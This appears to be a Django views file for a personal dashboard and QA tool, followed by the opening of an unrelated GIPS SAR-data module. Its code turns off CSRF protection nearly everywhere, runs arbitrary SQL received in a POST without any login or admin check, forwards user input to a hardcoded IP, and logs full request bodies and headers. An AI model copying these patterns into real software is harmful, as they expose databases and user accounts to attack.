:return: The login page.
"""
logout(request)
return render(request, OUTSIDE_PAGES_LOGIN)
@login_required(login_url=LOGIN_URL)
def trading_GET(request):
"""This handles the GET request to retrieve the trading page.
:param request: Contains information regarding the request sent in.
:return: The trading html page.
"""
return render(request, PERSONAL_PAGES_TRADING, {'dividend_data': Dividend.objects.filter(user=request.user), 'build_number': NEXUS_BUILD_NUMBER})
@login_required(login_url=LOGIN_URL)
def servers_GET(request):
"""This handles the GET request to retrieve the servers page.
:param request: Contains information regarding the request sent in.
:return: The servers html page.
"""
return render(request, ADMIN_PAGES_SERVERS, {'build_number': NEXUS_BUILD_NUMBER})
@login_required(login_url=LOGIN_URL)
def sleep_GET(request):
"""This handles the GET request to retrieve the sleep page.
:param request: Contains information regarding the request sent in.
:return: The sleep HTML page.
"""
return render(request, PERSONAL_PAGES_SLEEP, {'build_number': NEXUS_BUILD_NUMBER})
@login_required(login_url=LOGIN_URL)
def qa_GET(request):
"""This handles the GET request to retrieve the qa self testing page.
:param request: Contains information regarding the request sent in.
:return: The qa self testing HTML page.
"""
return render(request, QA_PAGES_SELF, {'build_number': NEXUS_BUILD_NUMBER})
@login_required(login_url=LOGIN_URL)
def nationals_GET(request):
"""This handles the GET request to retrieve the nationals page.
:param request: Contains information regarding the request sent in.
:return: The nationals testing HTML page.
"""
return render(request, QA_PAGES_NATIONALS, {'build_number': NEXUS_BUILD_NUMBER})
@login_required(login_url=LOGIN_URL)
def qa_selenium_tests_GET(request):
"""This handles the GET request to retrieve the qa selenium test page.
:param request: Contains information regarding the request sent in.
:return: The QA Selenium Tests page.
"""
all_selenium_tests = test_parser.get_test_functions_from_file(test_parser.QA_PATH)
return render(request, QA_PAGES_SELF_SELENIUM_TESTS, {'number_of_selenium_tests': len(all_selenium_tests) * len(selenium_base.SUPPORTED_BROWSERS), 'all_selenium_tests': all_selenium_tests, 'build_number': NEXUS_BUILD_NUMBER})
@login_required(login_url=LOGIN_URL)
def sk_selenium_tests_GET(request):
"""This handles the GET request to retrieve the SK page.
:param request: Contains information regarding the request sent in.
:return: The SK testing HTML page.
"""
all_selenium_tests = test_parser.get_test_functions_from_file(test_parser.SK_PATH)
return render(request, QA_PAGES_SK, {'all_selenium_tests': all_selenium_tests, 'number_of_selenium_tests': len(all_selenium_tests) * len(selenium_base.SUPPORTED_BROWSERS), 'build_number': NEXUS_BUILD_NUMBER})
@login_required(login_url=LOGIN_URL)
def database_GET(request):
"""This handles the GET request to retrieve the database page.
:param request: Contains information regarding the request sent in.
:return: The database HTML page.
"""
return render(request, ADMIN_PAGES_DATABASE, {'build_number': NEXUS_BUILD_NUMBER})
@login_required(login_url=LOGIN_URL)
def image_compression_GET(request):
"""This handles the GET request to retrieve the compression page.
:param request: Contains information regarding the request sent in.
:return: The compression HTML page.
"""
return render(request, SCC_PAGES_IMAGE_COMPRESSION, {'build_number': NEXUS_BUILD_NUMBER})
def get_current_time_as_string():
right_now = datetime.datetime.now()
current_hour = str(right_now.time().hour)
if len(current_hour) == 1:
current_hour = '0' + current_hour
current_minute = str(right_now.time().minute)
if len(current_minute) == 1:
current_minute = '0' + current_minute
return current_hour + ':' + current_minute
def get_current_date_as_string():
return datetime.datetime.strftime(datetime.datetime.now().date(), '%m/%d/%Y')
@login_required(login_url=LOGIN_URL)
def text_notifications_GET(request):
"""This handles the GET request to retrieve the text notifications page.
:param request: Contains information regarding the request sent in.
:return: The text notifications HTML page.
"""
a = ScheduledTextNotification.objects.filter(user=request.user)
# Find all the currently scheduled text notifications.
print('Printing all text notifications for user :' + str(request.user))
for p in a:
print(p)
return render(request, PERSONAL_PAGES_TEXT_NOTIFICATIONS, {'current_time': get_current_time_as_string(), 'current_date': get_current_date_as_string(), 'build_number': NEXUS_BUILD_NUMBER, 'scheduled_text_messages': a, 'current_text_messages': a})
@login_required(login_url=LOGIN_URL)
def work_hours_logging_GET(request):
"""This handles the GET request to retrieve the work hours logging page.
:param request: Contains information regarding the request sent in.
:return: The work hours logging HTML page.
"""
all_work_hours = WorkHours.objects.filter(user=request.user)
all_work_hours_for_this_week = []
all_work_hours_outside_of_this_week = []
today = datetime.datetime.today()
today = today.replace(tzinfo=pytz.utc)
today = today.replace(hour=0, minute=0, second=0)
day_of_week = today.weekday()
to_end_of_week = datetime.timedelta(days=6-day_of_week)
end_of_week = today + to_end_of_week
to_beginning_of_week = datetime.timedelta(days=day_of_week)
beginning_of_week = today - to_beginning_of_week
this_week = {0: [], 1: [], 2: [], 3: [], 4: [], 5: [], 6: []}
days = {0: 'Monday', 1: 'Tuesday', 2: 'Wednesday', 3: 'Thursday', 4: 'Friday', 5: 'Saturday', 6: 'Sunday'}
#print('Printing hours!')
for hours in all_work_hours:
# Get the DateTime object.
local_date_time = hours.start_or_stop_time
if local_date_time > beginning_of_week:
this_week[local_date_time.weekday()].append(local_date_time)
all_work_hours_for_this_week.append(hours)
else:
all_work_hours_outside_of_this_week.append(hours)
day_summary = []
hours_worked_for_the_week = 0
# Go through each day. e is the day number starting at 0.
for e in this_week:
this_week[e].sort()
total_seconds_for_the_day = 0
for i, t in enumerate(this_week[e]):
if i % 2 != 0:
delta = t - this_week[e][i - 1]
total_seconds_for_the_day += delta.total_seconds()
total_hours_worked = total_seconds_for_the_day / 3600.0
hours_worked_for_the_week += total_hours_worked
hours_worked_as_percentage_of_total = str(int((total_hours_worked / 8.0) * 100.0))
day_summary.append([days[e], hours_worked_as_percentage_of_total, str(total_hours_worked)])
total_percentage = str(int((hours_worked_for_the_week / 40.0) * 100.0))
return render(request, PERSONAL_PAGES_WORK_HOURS_LOGGING, {'total_percentage': total_percentage, 'total_hours': str(hours_worked_for_the_week), 'day_summary': day_summary, 'hours_works': all_work_hours_for_this_week, 'old_hours_worked': all_work_hours_outside_of_this_week, 'build_number': NEXUS_BUILD_NUMBER, 'current_date': get_current_date_as_string(), 'current_time': get_current_time_as_string()})
@login_required(login_url=LOGIN_URL)
def admin_GET(request):
"""This handles the GET request to retrieve the admin page.
:param request: Contains information regarding the request sent in.
:return: The admin HTML page.
"""
return render(request, ADMIN_PAGES_ADMIN, {'feedback': Feedback.objects.all(), 'projects': Project.objects.all(), 'build_number': NEXUS_BUILD_NUMBER})
''' __ __ ___ __
|__) /\ / ` |__/ |__ |\ | | \
|__) /~~\ \__, | \ |___ | \| |__/
'''
# User related!
@csrf_exempt
def verify_user_GET(request):
"""This handles the POST request for when a user clicks on their verification link.
:param request: Contains information regarding the request sent in.
:return: The HttpResponse. In this case nothing useful will be returned lol. Just empty text.
"""
email = request.GET.get('email', 'no_email')
user_to_verify = User.objects.get(email=email)
user_to_verify.profile.verify()
if email != 'no_email':
sms_sender.send_sms_message('New user has verified!', 'The user is :' + email, '[email protected]')
return SERVER_REPLY_GENERIC_YES
else:
return HttpResponse('Invalid request, please provide an email to verify.')
@csrf_exempt
def login_POST(request):
"""This handles the POST request to login.
:param request: Contains information regarding the request sent in.
:return: The HttpResponse. In this case just a string contain success or failure status.
"""
if check_POST_arguments([USERNAME, PASSWORD], request) is not None:
return check_POST_arguments([USERNAME, PASSWORD], request)
received_username = request.POST[USERNAME]
received_password = request.POST[PASSWORD]
user = authenticate(username=received_username, password=received_password)
if user is not None:
print('Valid login combo for : ' + received_username + '!')
login(request, user)
return SERVER_REPLY_GENERIC_YES
else:
print('Login attempt failed for ' + received_username + '!')
return SERVER_REPLY_GENERIC_NO
@csrf_exempt
def modify_account_POST(request):
"""This handles the POST request to modify a user's information.
:param request: Contains information regarding the request sent in.
:return: The HttpResponse. Just a server_reply_response_string.
"""
if check_POST_arguments([PHONE_NUMBER, CELL_CARRIER, ZIP_CODE, BIRTHDAY, FIRST_NAME, LAST_NAME], request) is not None:
return check_POST_arguments([PHONE_NUMBER, CELL_CARRIER, ZIP_CODE, BIRTHDAY, FIRST_NAME, LAST_NAME], request)
current_user = request.user
# TODO : Add syntax/formatting checks against these fields!
current_user.profile.update_profile_information(cell_number=request.POST[PHONE_NUMBER], cell_carrier=request.POST[CELL_CARRIER], zip_code=request.POST[ZIP_CODE], birthday=request.POST[BIRTHDAY], first_name=request.POST[FIRST_NAME], last_name=request.POST[LAST_NAME])
return SERVER_REPLY_GENERIC_YES
@csrf_exempt
def create_user_POST(request):
"""This handles the POST request to create a user.
:param request: Contains information regarding the request sent in.
:return: The HttpResponse. Just a server_reply_response_string.
"""
if check_POST_arguments([USERNAME, EMAIL, PASSWORD], request) is not None:
return check_POST_arguments([USERNAME, EMAIL, PASSWORD], request)
received_username = request.POST[USERNAME]
received_password = request.POST[PASSWORD]
received_email = request.POST[EMAIL]
if User.objects.filter(username=received_username).exists():
return SERVER_REPLY_GENERIC_SERVER_ERROR
elif User.objects.filter(email=received_email).exists():
return SERVER_REPLY_GENERIC_SERVER_ERROR
else:
print('The user ' + received_username + ' is being created and logged in!')
sms_sender.send_sms_message('Nexus Quality Assurance Account Verification', 'Hello hello! Please click this link to send the admin a verification request (sccqa.com/verify?email=' + received_email + '). This gets sent as a text message so account creation shoudln\'t take toooo long....(╯°□°)╯︵ ┻━┻ ..... ┬─┬ ノ( ゜-゜ノ).', received_email)
user = User.objects.create_user(username=received_username, password=received_password, email=received_email)
login(request, user)
return SERVER_REPLY_GENERIC_YES
@csrf_exempt
def delete_account_POST(request):
"""This handles the POST request to delete the user account.
:param request: Contains information regarding the request sent in.
:return: The HttpResponse. TODO : better documentation for this
"""
current_user = request.user
if current_user is not None:
print('Deleting the account : ' + str(current_user))
logout(request)
current_user.delete()
return SERVER_REPLY_GENERIC_YES
else:
print('Could not delete the account ' + str(current_user) + ' as it does not exist!?!')
return SERVER_REPLY_GENERIC_NO
@csrf_exempt
def send_recover_email_POST(request):
"""This handles the POST request to send a recovery email.
:param request: Contains information regarding the request sent in.
:return: The HttpResponse. Just a server_reply_response_string.
"""
if check_POST_arguments([EMAIL], request) is not None:
return check_POST_arguments([EMAIL], request)
received_email = request.POST[EMAIL]
if not User.objects.filter(email=received_email).exists():
return SERVER_REPLY_GENERIC_NO
else:
print('Recovery email sent to ' + received_email + '!')
sms_sender.send_sms_message('NQA response', 'Password recovery is not setup yet!', received_email)
return SERVER_REPLY_GENERIC_YES
# Admin back end operations.
@csrf_exempt
def hit_peon_URL_POST(request):
"""This handles the POST request to hit the peon server with a custom URL.
:param request: Contains information regarding the request sent in.
:return: The HttpResponse from the peon server.
"""
if check_POST_arguments([PEON_URL], request) is not None:
return check_POST_arguments([PEON_URL], request)
print('Got the peon url of : ' + str(request.POST[PEON_URL]) + '.')
received_peon_url = str(request.POST[PEON_URL]).replace('\n', '').replace(' ', '')
response = requests.get('http://23.253.22.69:1337/' + received_peon_url)
if response.status_code == 200:
return HttpResponse(response.content)
else:
print('Peon server error!')
return 'Peon server error!'
@csrf_exempt
def run_custom_SQL_POST(request):
"""This handles the POST request to run a custom SQL command.
:param request: Contains information regarding the request sent in.
:return: The HttpResponse.
"""
if check_POST_arguments([CUSTOM_SQL_COMMAND], request) is not None:
return check_POST_arguments([CUSTOM_SQL_COMMAND], request)
received_sql_command = request.POST[CUSTOM_SQL_COMMAND]
print('Received the custom SQL command : ' + str(received_sql_command))
results = db_api.run_custom_sql_command(received_sql_command)
print('The results were : ' + str(results))
return str(results)
# DIVIDENDS BACK END.
@csrf_exempt
def get_dividends_data_POST(request):
"""This handles the POST request to get dividends data.
:param request: Contains information regarding the request sent in.
:return: The HttpResponse.
"""
data = Dividend.objects.filter(user=request.user)
if 'as_string' in request.get_full_path():
return_string = ''
for d in data:
return_string += str(d)
return HttpResponse(data)
else:
json_data = []
for d in data:
local_data = {'payout_date': int(time.mktime(d.payout_date.timetuple())), 'number_of_shares': d.number_of_shares, 'pay_per_share': d.pay_per_share, 'share_ticker': d.share_ticker}
json_data.append(local_data)
return JsonResponse(json_data, safe=False)
@csrf_exempt
def add_dividend_payment_POST(request):
"""This handles the POST request to add a dividend payment.
:param request: Contains information regarding the request sent in.
:return: The HttpResponse.
"""
if check_POST_arguments([PAYMENT_PER_SHARE, STOCK_TICKER_SYMBOL, NUMBER_OF_SHARES, PAYOUT_DATE], request) is not None:
return check_POST_arguments([PAYMENT_PER_SHARE, STOCK_TICKER_SYMBOL, NUMBER_OF_SHARES, PAYOUT_DATE], request)
received_number_of_shares = request.POST[NUMBER_OF_SHARES]
received_payment_per_share = request.POST[PAYMENT_PER_SHARE]
received_stock_symbol = request.POST[STOCK_TICKER_SYMBOL]
received_payout_date = request.POST[PAYOUT_DATE]
segments = received_payout_date.split('/')
received_payout_date = segments[2] + '-' + segments[0] + '-' + segments[1]
dividend = Dividend(user=request.user, payout_date=received_payout_date, number_of_shares=received_number_of_shares, pay_per_share=received_payment_per_share, share_ticker=received_stock_symbol)
dividend.save()
return SERVER_REPLY_GENERIC_YES
@csrf_exempt
def remove_dividend_payment_POST(request):
"""This handles the POST request to remove a dividend payment.
:param request: Contains information regarding the request sent in.
:return: The HttpResponse.
"""
if check_POST_arguments([STOCK_TICKER_SYMBOL, PAYOUT_DATE], request) is not None:
return check_POST_arguments([STOCK_TICKER_SYMBOL, PAYOUT_DATE], request)
received_stock_symbol = request.POST[STOCK_TICKER_SYMBOL]
received_payout_date = request.POST[PAYOUT_DATE]
transaction = Dividend.objects.filter(payout_date=received_payout_date, share_ticker=received_stock_symbol)
transaction.delete()
# LOCUST BACK END.
@csrf_exempt
def is_locust_currently_running_GET(request):
if locust_api.is_locust_currently_running():
return SERVER_REPLY_GENERIC_YES
else:
return SERVER_REPLY_GENERIC_NO
@csrf_exempt
def get_current_table_data_GET(request):
try:
data = locust_api.get_current_table_data()
return data
except Exception as e:
print('Exception happened when trying to get currently table data for QA page.')
return JsonResponse({'data': []})
@csrf_exempt
def launch_swarming_POST(request):
if check_POST_arguments([NUMBER_OF_USERS, SPAWN_RATE, TEST_DURATION], request) is not None:
return check_POST_arguments([NUMBER_OF_USERS, SPAWN_RATE, TEST_DURATION], request)
received_number_of_users = request.POST[NUMBER_OF_USERS]
received_spawn_rate = request.POST[SPAWN_RATE]
received_test_duration = request.POST[TEST_DURATION]
print('Just got an order to launch swarming, here are the parameters : [' + str(received_number_of_users) + ', ' + str(received_spawn_rate) + ', ' + str(received_test_duration) + ']')
locust_api.launch_swarming(received_number_of_users, received_spawn_rate, received_test_duration)
return SERVER_REPLY_GENERIC_YES
# For text notification scheduling.
@csrf_exempt
def schedule_message_POST(request):
"""This handles the POST request to schedule a text notification message.
:param request: Contains information regarding the request sent in.
:return: The HttpResponse. Just a server_reply_response_string.
"""
if check_POST_arguments([MESSAGE_CONTENT, MESSAGE_TIME, MESSAGE_DATE], request) is not None:
return check_POST_arguments([MESSAGE_CONTENT, MESSAGE_TIME, MESSAGE_DATE], request)
current_user = request.user
received_content = str(request.POST[MESSAGE_CONTENT])
received_time = str(request.POST[MESSAGE_TIME])
received_date = str(request.POST[MESSAGE_DATE])
#print('This is the time that I got: ' + str(received_time))
#print('This is the date that I got: ' + str(received_date))
# TODO : Do more error checking here.
year = int(received_date.split('/')[2])
day = int(received_date.split('/')[1])
month = int(received_date.split('/')[0])
hour = int(received_time.split(':')[0])
minute = int(received_time.split(':')[1])
created_at_time = datetime.datetime.now()
scheduled_text_notification = ScheduledTextNotification(user=current_user, message_to_send=received_content, created_at=created_at_time, execute_at=created_at_time.replace(year=year, month=month, day=day, hour=hour, minute=minute))
scheduled_text_notification.save_and_schedule_message()
return SERVER_REPLY_GENERIC_YES
@csrf_exempt
def verify_message_was_sent_POST(request):
"""This handles the POST request to verify that a text notification message was sent.
:param request: Contains information regarding the request sent in.
:return: The HttpResponse. Just a server_reply_response_string.
"""
if check_POST_arguments([UNIQUE_ID], request) is not None:
return check_POST_arguments([UNIQUE_ID], request)
received_id = request.POST[UNIQUE_ID]
print('Just got a verification message!')
print('ID is : ' + str(received_id))
scheduled_text_notification = ScheduledTextNotification.objects.get(id=received_id)
scheduled_text_notification.verify()
return SERVER_REPLY_GENERIC_YES
# For QA/General Selenium.
class TestResult:
"""
Outlines the information contained in a single test result.
"""
def __init__(self, name, browser_used, run_time, passed, notes):
self.test_name = name
self.browser_used = browser_used
self.run_time = run_time
self.passed = passed
self.notes = notes
class TestSuite:
"""
Outlines the information contained in a single test suite.
"""
def __init__(self, unique_id, project_name):
self.unique_id = unique_id
self.project_name = project_name
class TestSuiteCache:
"""
Manages cache information for users and selenium tests run.
"""
def __init__(self):
# This will be a double dictionary. The first layer of key:pair is {user_name:dictionary_of_test_suites}.
# The dictionary_of_test_suites if composed of {test_suite_unique_number:list_of_selenium_tests}.
self.cache_for_users_and_test_suites = {}
def add_new_test_suite(self, username, unique_id, project_name):
"""This will add a new test suite to keep track of.
:param username: The name of the user.
:param unique_id: The unique id of the test suite.
:param project_name: The project name that this suite is testing.
:return: Void.
"""
if username not in self.cache_for_users_and_test_suites:
self.cache_for_users_and_test_suites[username] = {}
if unique_id not in self.cache_for_users_and_test_suites[username]:
self.cache_for_users_and_test_suites[username][unique_id] = {}
def add_new_test_result(self, test_result, unique_id):
"""This will add a new test result to keep track of.
:param test_result: The results of this specific test.
:param unique_id: The unique id of the test suite.
:return: Void.
"""
# Find the test suite.
user_match = None
for user_key in self.cache_for_users_and_test_suites.keys():
if unique_id in self.cache_for_users_and_test_suites[str(user_key)]:
user_match = str(user_key)
break
#print('--------------------------------------------------------------------------------------------------------------------------------')
#print('THE USER MATCH IS : {' + str(user_match) + '}')
#rint('--------------------------------------------------------------------------------------------------------------------------------')
if str(user_match) is None:
dbg.terminate('No match!')
if test_result.test_name not in self.cache_for_users_and_test_suites[user_match][unique_id]:
self.cache_for_users_and_test_suites[user_match][unique_id][test_result.test_name] = {}
self.cache_for_users_and_test_suites[user_match][unique_id][test_result.test_name][test_result.browser_used] = [False, test_result.run_time, test_result.passed, test_result.notes]
def fetch_test_results(self, username, unique_id):
"""This will return the data of a test suite that has not been sent yet.
:param username: The username to get the test suite from.
:param unique_id: Tue unique ID of the test suite to get single test results from.
:return: The results from the test suite.
"""
#print('---------------------------------------------------------------------------------------')
#print(username)
#print(unique_id)
#print(self.cache_for_users_and_test_suites)
#print('#######################################################################################')
#for user in self.cache_for_users_and_test_suites:
# print('Printing cache information for user : ' + str(user))
# for ts in self.cache_for_users_and_test_suites[user]:
# print('Printing cache information for test suite : ' + str(ts))
# for t in self.cache_for_users_and_test_suites[user][ts]:
# print('Printing cache information for test : ' + str(t))
# for st in self.cache_for_users_and_test_suites[user][ts][t]:
# print(str(st) + str(self.cache_for_users_and_test_suites[user][ts][t][st]))
#for k in self.cache_for_users_and_test_suites:
# print(str(k) + '\t' + str(self.cache_for_users_and_test_suites[k]))
#print('---------------------------------------------------------------------------------------')
data_to_return = []
if username in self.cache_for_users_and_test_suites:
if unique_id in self.cache_for_users_and_test_suites[username]:
# Go through each test.
for test_name in self.cache_for_users_and_test_suites[username][unique_id]:
# Go through each browser variation of that test.
for b in self.cache_for_users_and_test_suites[username][unique_id][test_name]:
#print('@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@')
#print(self.cache_for_users_and_test_suites[username][unique_id][test_name][b])
#print(self.cache_for_users_and_test_suites[username][unique_id][test_name][b][0])
#print('@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@')
if not self.cache_for_users_and_test_suites[username][unique_id][test_name][b][0]:
v0 = self.cache_for_users_and_test_suites[username][unique_id][test_name][b][1]
v1 = self.cache_for_users_and_test_suites[username][unique_id][test_name][b][2]
v2 = self.cache_for_users_and_test_suites[username][unique_id][test_name][b][3]
#data_to_return[test_name] = [b, v0, v1, v2]
data_to_return.append([test_name, b, v0, v1, v2])
# Mark this value as returned.
self.cache_for_users_and_test_suites[username][unique_id][test_name][b][0] = True
return data_to_return
else:
return {}
else:
return {}
def get_test_results_for_specific_test_suite(self, username, unique_id):
"""This will return the data of a specific test suite.
:param username: The username to get the test suite from.
:param unique_id: The unique ID of the test suite to get.
:return: The results from the test suite.
"""
if username in self.cache_for_users_and_test_suites:
if unique_id in self.cache_for_users_and_test_suites[username]:
return self.cache_for_users_and_test_suites[username][unique_id]
else:
return {}
else:
return {}
test_suite_cache = TestSuiteCache()
@csrf_exempt
def get_selenium_project_data_POST(request):
"""This handles the POST request to get selenium history data from the PEON server.
:param request: Contains information regarding the request sent in.
:return: The HttpResponse.
"""
if check_POST_arguments([PROJECT_NAME], request) is not None:
return check_POST_arguments([PROJECT_NAME], request)
# TODO : Add a check that this request was specifically sent from the PEON server.
response = requests.post(PEON_IP_URL + 'get_selenium_project_data', data={PROJECT_NAME: request.POST[PROJECT_NAME]})
return JsonResponse(ast.literal_eval(response.content.decode('utf-8')), safe=False)
@csrf_exempt
def get_test_suite_number_POST(request):
"""This handles the POST request to get a test suite number from the PEON server.
:param request: Contains information regarding the request sent in.
:return: The HttpResponse.
"""
if check_POST_arguments([PROJECT_NAME], request) is not None:
return check_POST_arguments([PROJECT_NAME], request)
received_project_name = request.POST[PROJECT_NAME]
global test_suite_cache
response = requests.post(PEON_IP_URL + 'get_test_suite_number', data={PROJECT_NAME: received_project_name})
if response.status_code == 200:
unique_id = response.content.decode('utf-8')
print('Got the test suite number of ' + str(unique_id) + '!')
test_suite_cache.add_new_test_suite(username=str(request.user), unique_id=unique_id, project_name=received_project_name)
return HttpResponse(unique_id)
else:
return SERVER_REPLY_GENERIC_NO
@csrf_exempt
def launch_test_suite_POST(request):
"""This handles the POST request to launch a test suite on the PEON server.
:param request: Contains information regarding the request sent in.
:return: The HttpResponse.
"""
if check_POST_arguments([UNIQUE_ID, PROJECT_NAME], request) is not None:
return check_POST_arguments([UNIQUE_ID, PROJECT_NAME], request)
response = requests.post(PEON_IP_URL + 'launch_test_suite', data={UNIQUE_ID: request.POST[UNIQUE_ID], PROJECT_NAME: request.POST[PROJECT_NAME]})
if response.status_code == 200:
return SERVER_REPLY_GENERIC_YES
else:
print('Error with PEON!')
print(response.content)
return SERVER_REPLY_GENERIC_NO
@csrf_exempt
def single_test_data_POST(request):
"""This handles the POST request to add test data into the server's cache.
:param request: Contains information regarding the request sent in.
:return: The HttpResponse.
"""
if check_POST_arguments([UNIQUE_ID, TEST_NAME, TEST_RUN_TIME, TEST_PASS_OR_FAIL, TEST_NOTES, BROWSER_USED], request) is not None:
return check_POST_arguments([UNIQUE_ID, TEST_NAME, TEST_RUN_TIME, TEST_PASS_OR_FAIL, TEST_NOTES, BROWSER_USED], request)
received_test_name = request.POST[TEST_NAME]
received_test_run_time = request.POST[TEST_RUN_TIME]
received_test_pass_or_fail = request.POST[TEST_PASS_OR_FAIL]
received_unique_id = request.POST[UNIQUE_ID]
received_test_notes = request.POST[TEST_NOTES]
received_browser_used = request.POST[BROWSER_USED]
# TODO : Add a check that the PEON was the one that sent the request.
global test_suite_cache
test_result = TestResult(name=received_test_name, browser_used=received_browser_used, run_time=received_test_run_time, passed=received_test_pass_or_fail, notes=received_test_notes)
test_suite_cache.add_new_test_result(test_result, received_unique_id)
return SERVER_REPLY_GENERIC_YES
@csrf_exempt
def fetch_suite_data_POST(request):
"""This handles the POST request to get any newly generated table data.
:param request: Contains information regarding the request sent in.
:return: Any new data in a JSON_Response.
"""
if check_POST_arguments([UNIQUE_ID], request) is not None:
return check_POST_arguments([UNIQUE_ID], request)
global test_suite_cache
data = test_suite_cache.fetch_test_results(str(request.user), request.POST[UNIQUE_ID])
return JsonResponse(data, safe=False)
@csrf_exempt
def get_table_data_POST(request):
"""This handles the POST request to get the current table data.
:param request: Contains information regarding the request sent in.
:return: The HttpResponse.
"""
if check_POST_arguments([UNIQUE_ID], request) is not None:
return check_POST_arguments([UNIQUE_ID], request)
global test_suite_cache
data = test_suite_cache.get_test_results_for_specific_test_suite(str(request.user), request.POST[UNIQUE_ID])
return JsonResponse(data, safe=False)
@csrf_exempt
def add_project_POST(request):
"""This handles the POST request to add a project.
:param request: Contains information regarding the request sent in.
:return: The HttpResponse. Just a server_reply_response_string.
"""
if check_POST_arguments([PROJECT_NAME, PROJECT_DESCRIPTION, CURRENT_HOME_URL], request) is not None:
return check_POST_arguments([PROJECT_NAME, PROJECT_DESCRIPTION, CURRENT_HOME_URL], request)
received_project_name = request.POST[PROJECT_NAME]
received_project_description = request.POST[PROJECT_DESCRIPTION]
received_current_home_url = request.POST[CURRENT_HOME_URL]
project = Project(project_name=received_project_name, project_description=received_project_description, current_home_url=received_current_home_url)
project.save()
return SERVER_REPLY_GENERIC_YES
# For work hours logging.
@csrf_exempt
def remove_work_hours_POST(request):
"""This handles the POST request to delete work hours.
:param request: Contains information regarding the request sent in.
:return: The HttpResponse. Just a server_reply_response_string.
"""
if check_POST_arguments([UNIQUE_ID], request) is not None:
return check_POST_arguments([UNIQUE_ID], request)
received_unique_id = request.POST[UNIQUE_ID]
work_hours = WorkHours.objects.filter(unique_id=received_unique_id)
work_hours.delete()
return SERVER_REPLY_GENERIC_YES
'''
@csrf_exempt
def get_work_hours_POST(request):
"""This handles the POST request to get the current user's work hours.
:param request: Contains information regarding the request sent in.
:return: The HttpResponse. Just a server_reply_response_string.
"""
data = []
original_data = WorkHours.objects.filter(user=request.user)
for d in original_data:
data.append({'start_or_stop_time': d.start_or_stop_time, 'is_start_time': d.is_start_time})
return JsonResponse(data)
'''
@csrf_exempt
def add_work_hours_POST(request):
"""This handles the POST request to add work hours.
:param request: Contains information regarding the request sent in.
:return: The HttpResponse. Just a server_reply_response_string.
"""
if check_POST_arguments([START_OR_STOP_TIME, IS_START_TIME], request) is not None:
return check_POST_arguments([START_OR_STOP_TIME, IS_START_TIME], request)
received_start_or_stop_time = request.POST[START_OR_STOP_TIME]
local_date = received_start_or_stop_time.split(',')[0]
local_time = received_start_or_stop_time.split(',')[1]
year = int(local_date.split('/')[2])
month = int(local_date.split('/')[0])
day = int(local_date.split('/')[1])
hour = int(local_time.split(':')[0])
minute = int(local_time.split(':')[1])
print('Hour: ' + str(hour))
print('Minute: ' + str(minute))
#date_time_object = datetime.datetime(year=year, month=month, day=day, hour=hour, minute=minute, tzinfo=pytz.timezone('America/Chicago'))
date_time_object = datetime.datetime(year=year, month=month, day=day, hour=hour, minute=minute)
print(date_time_object)
#print('Going to add the following date time object : ')
#print(str(date_time_object))
received_is_start_time = request.POST[IS_START_TIME]
if received_is_start_time == 'false' or received_is_start_time == '\'false\'':
received_is_start_time = False
elif received_is_start_time == 'true' or received_is_start_time == '\'true\'':
received_is_start_time = True
#print('Trying to add work hours!')
#print(received_start_or_stop_time)
#print(received_is_start_time)
work_hours = WorkHours(user=request.user, start_or_stop_time=date_time_object, is_start_time=received_is_start_time)
work_hours.save()
return SERVER_REPLY_GENERIC_YES
# For Feedback.
@csrf_exempt
def send_feedback_POST(request):
"""This handles the POST request to send feedback.
:param request: Contains information regarding the request sent in.
:return: The HttpResponse. Just a server_reply_response_string.
"""
if check_POST_arguments([CONTENT, PAGE_SENT_FROM], request) is not None:
return check_POST_arguments([CONTENT, PAGE_SENT_FROM], request)
received_feedback = request.POST[CONTENT]
received_page_sent_from = request.POST[PAGE_SENT_FROM]
feedback = Feedback(user=request.user, content=received_feedback, sent_at=datetime.datetime.now(), page_sent_from=received_page_sent_from)
feedback.save()
return SERVER_REPLY_GENERIC_YES
# SCC
def log_request(request):
with open('requests_logging.log', 'a') as f:
f.write(str(datetime.datetime.now()))
f.write(str(request.body))
f.write(str(request.body))
f.write(str(request.path))
f.write(str(request.path_info))
f.write(str(request.method))
f.write(str(request.META))
f.write(str('@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@'))
@csrf_exempt
def launch_functional_tests_for_sk_POST(request):
log_request(request)
return HttpResponse('This URL doesn\'t do anything yet :D')
@csrf_exempt
def launch_functional_tests_for_qa_POST(request):
log_request(request)
return HttpResponse('This URL doesn\'t do anything yet :D')
@csrf_exempt
def launch_functional_tests_for_nationals_POST(request):
log_request(request)
return HttpResponse('This URL doesn\'t do anything yet :D')
@csrf_exempt
def general_request(request):
log_request(request)
return HttpResponse('This URL doesn\t do anything yet :D')
#
@csrf_exempt
def send_data_to_flax_POST(request):
if check_POST_arguments(['qa_data'], request) is not None:
return check_POST_arguments(['qa_data'], request)
# qa_data
response = requests.post(PEON_IP_URL + 'send_data_to_flax', data={'qa_data': request.POST['qa_data']})
if response.status_code == 200:
print('Peon got the message to send data to flax!')
else:
print('Peon did not get the message to send data to flax!')
return SERVER_REPLY_GENERIC_YES
| apache-2.0 | -8,846,890,920,118,647,000 | 37.90747 | 403 | 0.698318 | false |
Applied-GeoSolutions/gips | gips/data/sarannual/sarannual.py | 1 | 6502 | #!/usr/bin/env python
################################################################################
# GIPS: Geospatial Image Processing System
#
# AUTHOR: Matthew Hanson
# EMAIL: [email protected]
#
# Copyright (C) 2014-2018 Applied Geosolutions
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>
################################################################################
import os
import datetime
import gippy
from gips.data.core import Repository, Asset, Data
from gips.utils import RemoveFiles, VerboseOut
from gips import utils
class sarannualRepository(Repository):
name = 'SARAnnual'
description = 'Synthetic Aperture Radar PALSAR Mosaics'
_datedir = '%Y'
@classmethod
def feature2tile(cls, feature):
""" Get tile designation from a geospatial feature (i.e. a row) """
fldindex_lat = feature.GetFieldIndex("lat")
